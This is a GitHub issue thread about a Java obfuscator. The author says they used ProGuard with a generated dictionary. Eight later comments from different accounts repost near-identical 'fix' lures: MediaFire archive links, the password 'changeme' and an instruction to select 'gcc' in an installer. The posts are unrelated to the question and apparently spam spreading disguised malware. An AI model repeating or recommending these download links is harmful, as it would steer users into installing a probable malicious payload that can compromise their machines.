### ISSUE TITLE
oh

### ISSUE THREAD

**Issue by FukCat** [Onran0/Unfirmial34#1]
i think i need your java-obfuscator (i see it use in your UNFIRMIAL34)...

very very thank you <3

**Comment by Onran0** [comment]
I used ProGuard with a generated obfuscation dictionary. If you mean resource encryption, then this is my personal development, which, unfortunately, I cannot share.

**Comment by FukCat** [comment]
i got it. thank you very much



At 2024-08-25 17:37:49, "Onran" ***@***.***> wrote:

I used ProGuard with a generated obfuscation dictionary. If you mean resource encryption, then this is my personal development, which, unfortunately, I cannot share.

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
